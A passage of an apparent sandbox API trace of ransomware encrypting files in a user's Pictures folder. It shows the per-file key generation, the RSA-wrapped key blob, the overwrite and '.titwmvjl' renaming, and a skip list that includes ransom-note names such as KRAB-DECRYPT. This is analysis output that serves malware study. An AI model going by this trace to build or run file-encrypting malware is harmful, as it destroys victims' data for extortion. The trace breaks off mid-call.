CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0094.332] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.332] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0094.332] GetLastError () returned 0x0 [0094.332] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.332] CryptDestroyKey (hKey=0x503938) returned 1 [0094.333] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.333] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.333] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.333] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0094.333] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.334] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x5035b8) returned 1 [0094.334] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.334] CryptGetKeyParam (in: hKey=0x5035b8, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0094.334] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.334] CryptEncrypt (in: hKey=0x5035b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0094.334] GetLastError () returned 0x0 [0094.334] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.335] CryptDestroyKey (hKey=0x5035b8) returned 1 [0094.335] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.335] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.335] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0094.335] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0094.335] ReadFile (in: hFile=0x2d4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259e78c*=0x7b64, lpOverlapped=0x0) returned 1 [0094.358] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xffff849c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.359] WriteFile (in: hFile=0x2d4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x7b64, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259e770*=0x7b64, lpOverlapped=0x0) returned 1 [0094.360] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.360] WriteFile (in: hFile=0x2d4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0094.361] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.365] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.365] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.365] CloseHandle (hObject=0x2d4) returned 1 [0094.369] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6\\zmN-bRUBdO1_f9B32.png" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\dp__bieng9\\3fmls7\\9jlzubtiz6\\zmn-brubdo1_f9b32.png"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6\\zmN-bRUBdO1_f9B32.png.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\dp__bieng9\\3fmls7\\9jlzubtiz6\\zmn-brubdo1_f9b32.png.titwmvjl"), dwFlags=0x1) returned 1 [0094.370] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.370] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 0 [0094.371] FindClose (in: hFindFile=0x5037b8 | out: hFindFile=0x5037b8) returned 1 [0094.371] CloseHandle (hObject=0x2cc) returned 1 [0094.372] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0094.372] lstrcmpW (lpString1="BCXVw0NtX.gif", lpString2=".") returned 1 [0094.372] lstrcmpW (lpString1="BCXVw0NtX.gif", lpString2="..") returned 1 [0094.372] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\", lpString2="BCXVw0NtX.gif" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\BCXVw0NtX.gif") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\BCXVw0NtX.gif" [0094.372] lstrlenW (lpString=".titwmvjl") returned 9 [0094.372] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\BCXVw0NtX.gif") returned 80 [0094.372] VirtualAlloc (lpAddress=0x0, dwSize=0xe0, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.372] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\BCXVw0NtX.gif.titwmvjl") returned 89 [0094.372] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\BCXVw0NtX.gif") returned 80 [0094.372] lstrlenW (lpString=".gif") returned 4 [0094.372] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.372] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".gif ") returned 5 [0094.372] lstrcmpiW (lpString1=".gif", lpString2=".titwmvjl") returned -1 [0094.372] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.372] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\BCXVw0NtX.gif") returned 80 [0094.372] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\BCXVw0NtX.gif") returned 80 [0094.373] lstrcmpiW (lpString1="BCXVw0NtX.gif", lpString2="desktop.ini") returned -1 [0094.373] lstrcmpiW (lpString1="BCXVw0NtX.gif", lpString2="autorun.inf") returned 1 [0094.373] lstrcmpiW (lpString1="BCXVw0NtX.gif", lpString2="ntuser.dat") returned -1 [0094.373] lstrcmpiW (lpString1="BCXVw0NtX.gif", lpString2="iconcache.db") returned -1 [0094.373] lstrcmpiW (lpString1="BCXVw0NtX.gif", lpString2="bootsect.bak") returned -1 [0094.373] lstrcmpiW (lpString1="BCXVw0NtX.gif", lpString2="boot.ini") returned -1 [0094.373] lstrcmpiW (lpString1="BCXVw0NtX.gif", lpString2="ntuser.dat.log") returned -1 [0094.373] lstrcmpiW (lpString1="BCXVw0NtX.gif", lpString2="thumbs.db") returned -1 [0094.373] lstrcmpiW (lpString1="BCXVw0NtX.gif", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0094.373] lstrcmpiW (lpString1="BCXVw0NtX.gif", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0094.373] lstrcmpiW (lpString1="BCXVw0NtX.gif", lpString2="KRAB-DECRYPT.html") returned -1 [0094.373] lstrcmpiW (lpString1="BCXVw0NtX.gif", lpString2="CRAB-DECRYPT.html") returned -1 [0094.373] lstrcmpiW (lpString1="BCXVw0NtX.gif", lpString2="KRAB-DECRYPT.txt") returned -1 [0094.373] lstrcmpiW (lpString1="BCXVw0NtX.gif", lpString2="CRAB-DECRYPT.txt") returned -1 [0094.373] lstrcmpiW (lpString1="BCXVw0NtX.gif", lpString2="ntldr") returned -1 [0094.373] lstrcmpiW (lpString1="BCXVw0NtX.gif", lpString2="NTDETECT.COM") returned -1 [0094.373] lstrcmpiW (lpString1="BCXVw0NtX.gif", lpString2="Bootfont.bin") returned -1 [0094.373] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\BCXVw0NtX.gif") returned 80 [0094.373] lstrlenW (lpString=".gif") returned 4 [0094.373] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.373] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".gif ") returned 5 [0094.373] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.373] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.374] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\BCXVw0NtX.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\dp__bieng9\\3fmls7\\bcxvw0ntx.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2cc [0094.374] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.374] ReadFile (in: hFile=0x2cc, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ea20*=0x21c, lpOverlapped=0x0) returned 1 [0094.375] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.375] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.375] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4c9980) returned 1 [0094.375] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0094.376] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0094.376] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0094.376] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e9dc | out: pbBuffer=0x259e9dc) returned 1 [0094.376] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.376] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.376] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.376] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.377] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4c9980) returned 1 [0094.377] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0094.377] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0094.377] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0094.377] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e9fc | out: pbBuffer=0x259e9fc) returned 1 [0094.377] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.378] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.378] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.378] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.378] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4c9980) returned 1 [0094.378] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.378] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x503278) returned 1 [0094.379] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.379] CryptGetKeyParam (in: hKey=0x503278, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0094.379] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.379] CryptEncrypt (in: hKey=0x503278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259e974*=0x100) returned 1 [0094.379] GetLastError () returned 0x0 [0094.379] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.379] CryptDestroyKey (hKey=0x503278) returned 1 [0094.379] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.380] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.380] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.380] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4c9980) returned 1 [0094.380] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.380] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x5033b8) returned 1 [0094.380] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.381] CryptGetKeyParam (in: hKey=0x5033b8, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0094.381] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.381] CryptEncrypt (in: hKey=0x5033b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259e974*=0x100) returned 1 [0094.381] GetLastError () returned 0x0 [0094.381] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.381] CryptDestroyKey (hKey=0x5033b8) returned 1 [0094.381] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.381] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.381] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0094.382] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0094.382] ReadFile (in: hFile=0x2cc, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ea20*=0x197c, lpOverlapped=0x0) returned 1 [0094.450] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xffffe684, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.450] WriteFile (in: hFile=0x2cc, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x197c, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ea04*=0x197c, lpOverlapped=0x0) returned 1 [0094.451] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.451] WriteFile (in: hFile=0x2cc, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ea04*=0x21c, lpOverlapped=0x0) returned 1 [0094.453] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.458] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.459] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.459] CloseHandle (hObject=0x2cc) returned 1 [0094.459] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\BCXVw0NtX.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\dp__bieng9\\3fmls7\\bcxvw0ntx.gif"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\BCXVw0NtX.gif.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\dp__bieng9\\3fmls7\\bcxvw0ntx.gif.titwmvjl"), dwFlags=0x1) returned 1 [0094.460] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.460] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0094.460] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0094.460] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0094.461] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\d2ca4a09d2ca4deb61a.lock" [0094.461] lstrlenW (lpString=".titwmvjl") returned 9 [0094.461] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\d2ca4a09d2ca4deb61a.lock") returned 91 [0094.461] VirtualAlloc (lpAddress=0x0, dwSize=0xf6, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.461] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 100 [0094.461] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\d2ca4a09d2ca4deb61a.lock") returned 91 [0094.461] lstrlenW (lpString=".lock") returned 5 [0094.461] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.461] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0094.461] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.461] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.461] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0094.461] lstrcmpW (lpString1="EXjve3jGvH0u_m.gif", lpString2=".") returned 1 [0094.462] lstrcmpW (lpString1="EXjve3jGvH0u_m.gif", lpString2="..") returned 1 [0094.462] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\", lpString2="EXjve3jGvH0u_m.gif" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\EXjve3jGvH0u_m.gif") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\EXjve3jGvH0u_m.gif" [0094.462] lstrlenW (lpString=".titwmvjl") returned 9 [0094.462] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\EXjve3jGvH0u_m.gif") returned 85 [0094.462] VirtualAlloc (lpAddress=0x0, dwSize=0xea, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.462] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\EXjve3jGvH0u_m.gif.titwmvjl") returned 94 [0094.462] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\EXjve3jGvH0u_m.gif") returned 85 [0094.462] lstrlenW (lpString=".gif") returned 4 [0094.462] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.462] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".gif ") returned 5 [0094.462] lstrcmpiW (lpString1=".gif", lpString2=".titwmvjl") returned -1 [0094.462] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.462] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\EXjve3jGvH0u_m.gif") returned 85 [0094.462] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\EXjve3jGvH0u_m.gif") returned 85 [0094.463] lstrcmpiW (lpString1="EXjve3jGvH0u_m.gif", lpString2="desktop.ini") returned 1 [0094.463] lstrcmpiW (lpString1="EXjve3jGvH0u_m.gif", lpString2="autorun.inf") returned 1 [0094.463] lstrcmpiW (lpString1="EXjve3jGvH0u_m.gif", lpString2="ntuser.dat") returned -1 [0094.463] lstrcmpiW (lpString1="EXjve3jGvH0u_m.gif", lpString2="iconcache.db") returned -1 [0094.463] lstrcmpiW (lpString1="EXjve3jGvH0u_m.gif", lpString2="bootsect.bak") returned 1 [0094.463] lstrcmpiW (lpString1="EXjve3jGvH0u_m.gif", lpString2="boot.ini") returned 1 [0094.463] lstrcmpiW (lpString1="EXjve3jGvH0u_m.gif", lpString2="ntuser.dat.log") returned -1 [0094.463] lstrcmpiW (lpString1="EXjve3jGvH0u_m.gif", lpString2="thumbs.db") returned -1 [0094.463] lstrcmpiW (lpString1="EXjve3jGvH0u_m.gif", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0094.463] lstrcmpiW (lpString1="EXjve3jGvH0u_m.gif", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0094.463] lstrcmpiW (lpString1="EXjve3jGvH0u_m.gif", lpString2="KRAB-DECRYPT.html") returned -1 [0094.463] lstrcmpiW (lpString1="EXjve3jGvH0u_m.gif", lpString2="CRAB-DECRYPT.html") returned 1 [0094.463] lstrcmpiW (lpString1="EXjve3jGvH0u_m.gif", lpString2="KRAB-DECRYPT.txt") returned -1 [0094.463] lstrcmpiW (lpString1="EXjve3jGvH0u_m.gif", lpString2="CRAB-DECRYPT.txt") returned 1 [0094.463] lstrcmpiW (lpString1="EXjve3jGvH0u_m.gif", lpString2="ntldr") returned -1 [0094.463] lstrcmpiW (lpString1="EXjve3jGvH0u_m.gif", lpString2="NTDETECT.COM") returned -1 [0094.463] lstrcmpiW (lpString1="EXjve3jGvH0u_m.gif", lpString2="Bootfont.bin") returned 1 [0094.463] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\EXjve3jGvH0u_m.gif") returned 85 [0094.463] lstrlenW (lpString=".gif") returned 4 [0094.463] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.463] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".gif ") returned 5 [0094.463] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.464] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.464] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\EXjve3jGvH0u_m.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\dp__bieng9\\3fmls7\\exjve3jgvh0u_m.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2cc [0094.464] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.464] ReadFile (in: hFile=0x2cc, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ea20*=0x21c, lpOverlapped=0x0) returned 1 [0094.465] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.465] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.465] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4c9980) returned 1 [0094.466] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0094.466] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0094.466] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0094.466] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e9dc | out: pbBuffer=0x259e9dc) returned 1 [0094.467] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.467] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.467] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.467] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.467] CryptAcquireContextW (in: 